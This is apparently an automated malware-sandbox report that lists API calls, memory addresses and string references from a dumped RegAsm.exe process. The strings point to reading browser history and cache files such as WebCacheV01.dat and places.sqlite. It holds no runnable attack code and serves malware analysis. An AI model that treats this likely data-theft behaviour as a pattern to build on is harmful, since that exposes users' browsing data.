                                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                • API String ID: 3354267031-2114579845
                                                                APIs
                                                                • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Resource$FindLoadLockSizeof
                                                                • String ID:
                                                                • API String ID: 3473537107-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID:
                                                                • API String ID: 613200358-0
                                                                APIs
                                                                Strings
                                                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset
                                                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                • API String ID: 2221118986-1725073988
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??3@DeleteObject
                                                                • String ID: r!A
                                                                • API String ID: 1103273653-628097481
                                                                APIs
                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??2@
                                                                • String ID:
                                                                • API String ID: 1033339047-0
                                                                APIs
                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$memcmp
                                                                • String ID: $$8
                                                                • API String ID: 2808797137-435121686
                                                                APIs
                                                                  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                  • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                  • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                  • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                  • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                • String ID:
                                                                • API String ID: 1979745280-0
                                                                APIs
                                                                  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                • memset.MSVCRT ref: 00414C87
                                                                • wcscpy.MSVCRT ref: 00414CFC
                                                                  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                Strings
                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressProcVersionmemsetwcscpy
                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                • API String ID: 4182280571-2036018995
                                                                APIs
                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                • memset.MSVCRT ref: 00403A55
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                • String ID: history.dat$places.sqlite
                                                                • API String ID: 2641622041-467022611
                                                                APIs
                                                                  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                • GetLastError.KERNEL32 ref: 00417627
                                                                Similarity
                                                                • API ID: ErrorLast$File$PointerRead
                                                                • String ID:
                                                                • API String ID: 839530781-0
                                                                Similarity
                                                                • API ID: FileFindFirst
                                                                • String ID: *.*$index.dat
                                                                • API String ID: 1974802433-2863569691
                                                                APIs
                                                                • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                • GetLastError.KERNEL32 ref: 004175A2
                                                                • GetLastError.KERNEL32 ref: 004175A8
                                                                Similarity
                                                                • API ID: ErrorLast$FilePointer
                                                                • String ID:
                                                                • API String ID: 1156039329-0
                                                                APIs
                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                Similarity
                                                                • API ID: File$CloseCreateHandleTime
                                                                • String ID:
                                                                • API String ID: 3397143404-0
                                                                APIs
                                                                • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                Similarity
                                                                • API ID: Temp$DirectoryFileNamePathWindows
                                                                • String ID:
                                                                • API String ID: 1125800050-0
                                                                APIs
                                                                • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                Similarity
                                                                • API ID: CloseHandleSleep
                                                                • String ID: }A
                                                                • API String ID: 252777609-2138825249
                                                                APIs
                                                                • malloc.MSVCRT ref: 00409A10
                                                                • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                • free.MSVCRT ref: 00409A31
                                                                Similarity
                                                                • API ID: freemallocmemcpy
                                                                • String ID:
                                                                • API String ID: 3056473165-0
                                                                Similarity
                                                                • API ID:
                                                                • String ID: d
                                                                • API String ID: 0-2564639436
                                                                Similarity
                                                                • API ID: memset
                                                                • String ID: BINARY
                                                                • API String ID: 2221118986-907554435
                                                                Similarity
                                                                • API ID: _wcsicmp
                                                                • String ID: /stext
                                                                • API String ID: 2081463915-3817206916
                                                                APIs
                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                Similarity
                                                                • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                • String ID:
                                                                • API String ID: 2445788494-0
                                                                APIs
                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                Similarity
                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                • String ID:
                                                                • API String ID: 3150196962-0
                                                                Strings
                                                                • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                Similarity
                                                                • API ID: malloc
                                                                • String ID: failed to allocate %u bytes of memory
                                                                • API String ID: 2803490479-1168259600
                                                                APIs
                                                                • memset.MSVCRT ref: 0041BDDF
                                                                • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                Similarity
                                                                • API ID: memcmpmemset
                                                                • String ID:
                                                                • API String ID: 1065087418-0
                                                                APIs
                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                Similarity
                                                                • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                • String ID:
                                                                • API String ID: 1381354015-0
                                                                Similarity
                                                                • API ID: memset
                                                                • String ID:
                                                                • API String ID: 2221118986-0
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                APIs
                                                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                  • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                  • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                Similarity
                                                                • API ID: File$Time$CloseCompareCreateHandlememset
                                                                • String ID:
                                                                • API String ID: 2154303073-0
                                                                APIs
                                                                  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                Similarity
                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                • String ID:
                                                                • API String ID: 3150196962-0
                                                                APIs
                                                                • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                Similarity
                                                                • API ID: File$PointerRead
                                                                • String ID:
                                                                • API String ID: 3154509469-0
                                                                APIs
                                                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                Similarity
                                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                                • String ID:
                                                                • API String ID: 4232544981-0
                                                                APIs
                                                                • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                Similarity
                                                                • API ID: FreeLibrary
                                                                • String ID:
                                                                • API String ID: 3664257935-0
                                                                APIs
                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                Similarity
                                                                • API ID: AddressProc$FileModuleName
                                                                • String ID:
                                                                • API String ID: 3859505661-0
                                                                APIs
                                                                • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                APIs
                                                                • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                Similarity
                                                                • API ID: FileWrite
                                                                • String ID:
                                                                • API String ID: 3934441357-0
                                                                APIs
                                                                • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                Similarity
                                                                • API ID: FreeLibrary
                                                                • String ID:
                                                                • API String ID: 3664257935-0
                                                                APIs
                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                APIs
                                                                • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID:
                                                                • API String ID: 613200358-0
                                                                APIs
                                                                • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                Similarity
                                                                • API ID: FreeLibrary
                                                                • String ID:
                                                                • API String ID: 3664257935-0
                                                                APIs
                                                                • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                Similarity
                                                                • API ID: EnumNamesResource
                                                                • String ID:
                                                                • API String ID: 3334572018-0
                                                                APIs
                                                                • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                Similarity
                                                                • API ID: FreeLibrary
                                                                • String ID:
                                                                • API String ID: 3664257935-0
                                                                APIs
                                                                • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                Similarity
                                                                • API ID: CloseFind
                                                                • String ID:
                                                                • API String ID: 1863332320-0
                                                                APIs
                                                                • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                Similarity
                                                                • API ID: Open
                                                                • String ID:
                                                                • API String ID: 71445658-0
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                APIs
                                                                • memset.MSVCRT ref: 004095FC
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                  • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                  • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                Similarity
                                                                • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                • String ID:
                                                                • API String ID: 3655998216-0
                                                                APIs
                                                                • memset.MSVCRT ref: 00445426
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                Similarity
                                                                • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                • String ID:
                                                                • API String ID: 1828521557-0
                                                                Similarity
                                                                • API ID: _wcsicmp
                                                                • String ID:
                                                                • API String ID: 2081463915-0
                                                                APIs
                                                                  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                Similarity
                                                                • API ID: File$CloseCreateErrorHandleLastRead
                                                                • String ID:
                                                                • API String ID: 2136311172-0
                                                                APIs
                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                Similarity
                                                                • API ID: ??2@??3@
                                                                • String ID:
                                                                • API String ID: 1936579350-0
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                APIs
                                                                • EmptyClipboard.USER32 ref: 004098EC
                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                • GetLastError.KERNEL32 ref: 0040995D
                                                                • CloseHandle.KERNEL32(?), ref: 00409969
                                                                • GetLastError.KERNEL32 ref: 00409974
                                                                • CloseClipboard.USER32 ref: 0040997D
                                                                Similarity
                                                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                • String ID:
                                                                • API String ID: 3604893535-0
                                                                APIs
                                                                • EmptyClipboard.USER32 ref: 00409882
                                                                • wcslen.MSVCRT ref: 0040988F
                                                                • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                • CloseClipboard.USER32 ref: 004098D7
                                                                Similarity
                                                                • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                • String ID:
                                                                • API String ID: 1213725291-0
                                                                APIs
                                                                • GetLastError.KERNEL32 ref: 004182D7
                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                • LocalFree.KERNEL32(?), ref: 00418342
                                                                • free.MSVCRT ref: 00418370
                                                                  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
